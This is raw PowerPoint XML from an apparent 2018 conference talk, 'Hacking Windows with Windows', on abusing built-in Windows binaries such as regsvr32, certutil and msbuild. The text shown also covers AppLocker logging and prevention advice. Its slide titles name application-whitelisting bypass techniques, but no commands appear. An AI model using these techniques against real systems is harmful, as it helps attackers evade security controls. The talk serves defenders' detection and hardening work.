                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harder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to block for instance c:\windows\tasks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5CD5A53-8F9C-4254-9D4F-A03C56A00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45" y="1563638"/>
            <a:ext cx="7715722" cy="2016224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84674278-44E3-4166-AB79-24D1F40EB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9752" y="1261352"/>
            <a:ext cx="4680520" cy="463702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20407B37-C176-476F-A817-839180306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756" y="1261352"/>
            <a:ext cx="4608512" cy="3802652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445B0EE6-0DAE-4E36-BC2B-A888E21E5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76" y="1635646"/>
            <a:ext cx="8398448" cy="16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5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443614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Centralize logging – Event forwarder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka.ms/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weffles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AppLocker General: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Event 8000 – Error – Error with Policy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Event 8001 – Information – Policy successfully applied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Event 8007 – AppLocker is disabled on this Windows version</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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Executables: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Event 8002 – Information – Was allowed to run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Event 8003 – Warning – Was allowed to run, but had been blocked if enforce was on (Audit)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Event 8004 – Error – Was blocked from running</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US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Scripts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Event 8005 – Information – Was allowed to run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Event 8006 – Warning - Was allowed to run, but had been blocked if enforce was on (Audit)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Event 8007 – Error – Was blocked from running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ID 8020 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>til</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8027 – Packages/modern apps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39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7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5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44361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 PowerShell logs as well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B35C2EB-1A68-49DA-893C-6191307F6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36920"/>
            <a:ext cx="7272808" cy="369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74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DETECTION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443614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Remove PowerShell version 2				Turn on Script block logging</a:t>
            </a:r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4F609DC5-36A5-4F47-BD5F-E5BAC3D49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275606"/>
            <a:ext cx="3276768" cy="2889398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49820A5E-0562-4B06-92E3-FC33D49A9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4" y="1275606"/>
            <a:ext cx="5658141" cy="35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33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799905"/>
            <a:ext cx="8229600" cy="4436141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accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A lot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>techniques</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>going</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> forward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>increase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> time and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cost</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mechanisms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus, IDS/IPS, Application Whitelisting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>solution</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2200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48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2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THANK YOU! – I am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on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twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oddvarmoe</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="24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23529" y="2480441"/>
            <a:ext cx="8229600" cy="266382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Shout-outs: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Casey Smith - @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subtee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Cneelis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SwiftOnSecurity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Nick Landers @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>monoxgas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Jimmy - @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bohops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Adam - @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hexacorn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Matt Nelson - @enigma0x3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+++++ Everyone else I forgot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F3B9325E-3480-4D28-A178-64D8AC546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154668"/>
            <a:ext cx="5210944" cy="2935498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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FA2CEC37-3202-4CCE-8749-8044A6F9DFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20081264">
            <a:off x="45597" y="962622"/>
            <a:ext cx="361236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nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Think green!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13706283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dirty="0"/>
              <a:t>Slides and demos from the conference will be available at github.com/nordicinfrastructureconference/2018 (bit.ly/2y7JhA3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58567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3528392"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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C38DD6A0-488D-4557-8CF8-8BE5EDC17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495"/>
            <a:ext cx="9144000" cy="505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64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27BCEEC6-CCB4-4024-A45A-7AA48D9F9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123478"/>
            <a:ext cx="9582276" cy="4948014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3528392"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr 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470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3528392"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="7200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14DF6E3-81A5-4335-BB0B-2D82FDDD6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1" y="1419622"/>
            <a:ext cx="4301740" cy="2273130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2746912B-BD58-4516-A49E-8118994AE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19622"/>
            <a:ext cx="5117139" cy="22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3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D51032C51DA24458A9FF9BD331C77C3" ma:contentTypeVersion="2" ma:contentTypeDescription="Opprett et nytt dokument." ma:contentTypeScope="" ma:versionID="4b85e52c484fa3d3aedd82cb48e1a044">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="928efe62-90f7-4330-b3a0-5b3e20b49c2b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="82d756963f2f4b57586f0cd774224fd0" ns2:_="">
    <xsd:import namespace="928efe62-90f7-4330-b3a0-5b3e20b4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fe62-90f7-4330-b3a0-5b3e20b49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6FD79E-18DF-4718-B9D0-EA36CF94E5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8efe62-90f7-4330-b3a0-5b3e20b4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8B8D88-7621-49EE-87E3-7FF284363B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D328D-E1E5-4167-AFF9-93EDD9EDCF2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928efe62-90f7-4330-b3a0-5b3e20b49c2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2179</TotalTime>
  <Words>1131</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Skjermfremvisning (16:9)</PresentationFormat>
  <Paragraphs>285</Paragraphs>
  <Slides>69</Slides>
  <Notes>64</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>8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69</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="76" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Museo Sans 100</vt:lpstr>
      <vt:lpstr>Museo Sans 300</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>PPT-mal_NIC</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>Hacking Windows with Windows  </vt:lpstr>
      <vt:lpstr>Get-Aduser ‘Oddvar Moe’</vt:lpstr>
      <vt:lpstr>What I will cover</vt:lpstr>
      <vt:lpstr>Difficult to start hacking someone?</vt:lpstr>
      <vt:lpstr>Best attack ATM!</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>«Living off the land»</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>How to use Windows binaries?</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>BINARY EXECUTION EXAMPLES</vt:lpstr>
      <vt:lpstr>Probably your feelings after this</vt:lpstr>
      <vt:lpstr>REGSVR32.exe</vt:lpstr>
      <vt:lpstr>REGSVR32.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>Congratulations Oddvar – You started Calc!</vt:lpstr>
      <vt:lpstr>RUNDLL32.exe</vt:lpstr>
      <vt:lpstr>RUNDLL32.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>SyncAppvPublishingServer.exe</vt:lpstr>
      <vt:lpstr>SyncAppvPublishingServer.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>CERTUTIL.exe</vt:lpstr>
      <vt:lpstr>CERTUTIL.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>MSBUILD.exe</vt:lpstr>
      <vt:lpstr>MSBUILD.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>INSTALLUTIL.exe</vt:lpstr>
      <vt:lpstr>INSTALLUTIL.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>Regsvcs.exe and regasm.exe</vt:lpstr>
      <vt:lpstr>Regsvcs.exe and regasm.exe</vt:lpstr>
      <vt:lpstr>Winword.exe</vt:lpstr>
      <vt:lpstr>Winword.exe</vt:lpstr>
      <vt:lpstr>Mavinject32.exe</vt:lpstr>
      <vt:lpstr>Mavinject32.exe</vt:lpstr>
      <vt:lpstr>Bginfo.exe</vt:lpstr>
      <vt:lpstr>Bginfo.exe</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>Some worth mentioning as well</vt:lpstr>
      <vt:lpstr>Not only Windows binaries</vt:lpstr>
      <vt:lpstr>Are there more of these binaries?</vt:lpstr>
      <vt:lpstr>Evolving further – Next Gen</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>PowerPoint-presentasjon</vt:lpstr>
      <vt:lpstr>Legacy Windows features - DCOM</vt:lpstr>
      <vt:lpstr>Weaponizing</vt:lpstr>
      <vt:lpstr>Demo - ALBY</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>PREVENTION (Make it harder)</vt:lpstr>
      <vt:lpstr>DETECTION</vt:lpstr>
      <vt:lpstr>DETECTION</vt:lpstr>
      <vt:lpstr>DETECTION</vt:lpstr>
      <vt:lpstr>SUMMARY</vt:lpstr>
      <vt:lpstr>THANK YOU! – I am on twitter @oddvarmoe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Oddvar Håland Moe</cp:lastModifiedBy>
  <cp:revision>115</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-21T10:27:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-02T11:17:20Z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0x0101008D51032C51DA24458A9FF9BD331C77C3</vt:lpwstr>
  </property>
</Properties>
</file>